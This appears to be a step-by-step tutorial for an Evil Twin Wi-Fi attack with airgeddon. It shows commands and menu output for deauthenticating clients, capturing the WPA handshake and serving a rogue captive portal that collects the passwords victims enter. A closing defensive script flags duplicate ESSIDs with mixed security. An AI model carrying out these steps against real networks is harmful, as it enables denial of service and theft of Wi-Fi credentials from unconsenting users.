Evil Twin Attack


Installing Airgeddon from GitHub

Download Airgeddon from GitHub and run it:

				
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash ./airgeddon.sh
				
			

Check that all the tools are installed before running the airgeddon framework:

				
Essential
ifconfig .... Ok
iwconfig .... Ok
iw .... Ok
awk .... Ok
airmon-ng .... Ok
airodump-ng .... Ok
aircrack-ng .... Ok
xterm .... Ok
ip .... Ok
lspci .... Ok
ps .... Ok

Optional
sslstrip .... Ok
asleap .... Ok
bettercap .... Ok
packetforge-ng .... Ok
etterlog .... Ok
hashcat .... Ok
wpaclean .... Ok
john .... Ok
aireplay-ng .... Ok
bully .... Ok
ettercap .... Ok
mdk4 .... Ok
hostapd .... Ok
lighttpd .... Ok
pixiewps .... Ok
wash .... Ok
openssl .... Ok
dhcpd .... Ok
reaver .... Ok
dnsspoof .... Ok
beef-xss .... Ok
hostapd-wpe .... Ok
iptables .... Ok
crunch .... Ok

				
			

Select the preferred network interface

				
***************************** Interface selection ******************************
Select an interface to work with:
---------
1.  eth0  // Chipset: Broadcom Corp. BCM2046B1
2.  wlan0 // 2.4Ghz // Chipset:  Realtek Semiconductor Corp. RTL8812AU
---------
*Hint* Every time you see a text with the prefix [PoT] acronym for "Pending of Translation", means the translation has been automatically generated and is still pending of review
---------
				
			

In the main menu, put your interface into monitor mode with option 2.
Then select option 7 for the Evil Twin attacks menu.

				
***************************** airgeddon main menu ******************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz

Select an option from menu:
---------
0.  Exit script
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
---------
4.  DoS attacks menu
5.  Handshake tools menu
6.  Offline WPA/WPA2 decrypt menu
7.  Evil Twin attacks menu
8.  WPS attacks menu
9.  WEP attacks menu
10. Enterprise attacks menu
---------
11. About & Credits
12. Options and language menu
---------
*Hint* If you install ccze you'll see some parts of airgeddon in a colorized way with better aspect. It's not a requirement or a dependency, but it will improve the user experience
---------
				
			

Then select option 9 for the Evil Twin AP attack with captive portal (this could be a custom build).

				
**************************** Evil Twin attacks menu ****************************
Interface wlan0 selected. Mode: Managed. Supported bands: 2.4Ghz
Selected BSSID: None
Selected channel: None
Selected ESSID: None

Select an option from menu:
---------
0.  Return to main menu
1.  Select another network interface
2.  Put interface in monitor mode
3.  Put interface in managed mode
4.  Explore for targets (monitor mode needed)
---------------- (without sniffing, just AP) -----------------
5.  Evil Twin attack just AP
---------------------- (with sniffing) -----------------------
6.  Evil Twin AP attack with sniffing
7.  Evil Twin AP attack with sniffing and sslstrip
8.  Evil Twin AP attack with sniffing and bettercap-sslstrip2/BeEF
------------- (without sniffing, captive portal) -------------
9.  Evil Twin AP attack with captive portal (monitor mode needed)
---------
*Hint* In order to use the Evil Twin just AP and sniffing attacks, you must have another one interface in addition to the wifi network interface will become the AP, which will provide internet access to other clients on the network. This doesn't need to be wifi, can be ethernet
---------
				
			

Press Enter and wait for the framework to detect the Wi-Fi networks.
Press Ctrl+C to stop searching, then select your Wi-Fi network for the test.
For this to work, you should choose the orange network marked with the asterisk.

				
An exploration looking for targets is going to be done...
Press [Enter] key to continue...

**************************** Exploring for targets ****************************
Exploring for targets option chosen (monitor mode needed)
Selected interface wlan0mon is in monitor mode. Explorations can be performed
WPA/WPA2 filter enabled in scan. When started, press [Ctrl+C] to stop...
Press [Enter] key to continue...
				
			

On the next menu, pick your preferred de-authentication attack.
Choose yes when asked about DoS pursuit mode, which follows the AP when it moves to another channel.

				
Select an option from menu:
---------
0.  Return to Evil Twin attacks menu
---------
1.  Deauth / disassoc amok mdk3 attack
2.  Deauth aireplay attack
3.  WIDS / WIPS / WDS Confusion attack
---------
*Hint* If you can't deauth clients from an AP using an attack, choose another one :)
---------
2

If you want to integrate "DoS pursuit mode" on an Evil Twin attack, another additional wifi interface in monitor mode will be needed to be able to perform it

Do you want to enable "DoS pursuit mode"? This will launch again the attack if target AP change its channel countering "channel hopping" [y/N]
N
At this point there are two options to prepare the captive portal. Either having an interface with internet access, or making a fake DNS using dnsspoof

Are you going to use the interface with internet access method? If the answer is no ("n"), you'll need dnsspoof installed to continue. Both will be checked [y/N]
N
				
			

Answer No to the question asking whether you have already captured the handshake.
Then answer Yes or No to the question asking whether you want to spoof your MAC address.

				
Do you want to spoof your MAC address during this attack? [y/N]
N
This attack requires that you have previously a WPA/WPA2 network captured Handshake file

If you don't have a captured Handshake file from the target network you can get it now
---------

Do you already have a captured Handshake file? Answer yes ("y") to enter the path or answers no ("n") to capture a new one now [y/N]
N
				
			

Then start the capturing process and wait for the WPA handshake. The terminals close when it's done. When the handshake is captured, choose the path for saving it.

				
Choose the language in which network clients will see the captive portal:
---------
0.  Return to Evil Twin attacks menu
---------
1.  English
2.  Spanish
3.  French
4.  Catalan
5.  Portuguese
6.  Russian
7.  Greek
8.  Italian
9.  Polish
10. German
				
			

Then 6 terminals open, each displaying its own process. In the top-right window, you see the connected clients and the password they entered.
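
From the defending side, the captive-portal variant walked through above shows up on the air as an extra BSSID announcing an ESSID that already exists. The following is an added example, not part of the original post or of airgeddon: it reads a CSV assumed to follow the column layout of the AP section of an airodump-ng capture and reports every ESSID announced by several BSSIDs where at least one is open and another is encrypted. The function names and sample rows are constructed, and treating the rogue AP as open is an assumption.

```shell
#!/bin/sh
# Added example: flag ESSIDs announced by several BSSIDs with mixed security.
# Assumed columns: 1 = BSSID, 6 = Privacy, 14 = ESSID (ESSIDs without commas).

find_twin_candidates() {
    # $1: CSV file; prints "ESSID|open BSSID(s)" for each suspicious ESSID
    awk -F',' '
        function trim(s) { gsub(/^[ \t\r]+|[ \t\r]+$/, "", s); return s }
        /^Station MAC/ { exit }            # client section starts: stop reading
        NF < 14 || $1 ~ /^BSSID/ { next }  # skip header and blank lines
        {
            bssid = trim($1); priv = trim($6); essid = trim($14)
            if (essid == "") next          # hidden network, nothing to compare
            if (!((essid, bssid) in seen)) { seen[essid, bssid] = 1; count[essid]++ }
            if (priv ~ /^OPN/) opn[essid] = opn[essid] " " bssid
            else               enc[essid] = 1
        }
        END {
            for (e in count)
                if (count[e] > 1 && (e in opn) && (e in enc))
                    printf "%s|%s\n", e, substr(opn[e], 2)
        }
    ' "$1" | sort
}

write_sample() {
    # Constructed sample data: two WPA2 APs and one open AP share "CorpWiFi".
    cat > "$1" <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:AA:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WPA2, CCMP, PSK, -40, 120, 0,   0.  0.  0.  0,   8, CorpWiFi,
02:00:00:AA:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11,  54, WPA2, CCMP, PSK, -55, 110, 0,   0.  0.  0.  0,   8, CorpWiFi,
02:00:00:EE:00:99, 2024-01-01 10:03:10, 2024-01-01 10:05:00,  6,  54, OPN, , , -30, 300, 0,   0.  0.  0.  0,   8, CorpWiFi,
02:00:00:BB:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN, , , -70, 90, 0,   0.  0.  0.  0,   9, GuestCafe,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:CC:00:05, 2024-01-01 10:01:00, 2024-01-01 10:05:00, -45, 40, 02:00:00:EE:00:99, CorpWiFi
EOF
}

sample=$(mktemp)
write_sample "$sample"
find_twin_candidates "$sample"
rm -f "$sample"
```

A hit is a lead to check against the site's access-point inventory, since a legitimate open guest network can share a name with an encrypted one.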
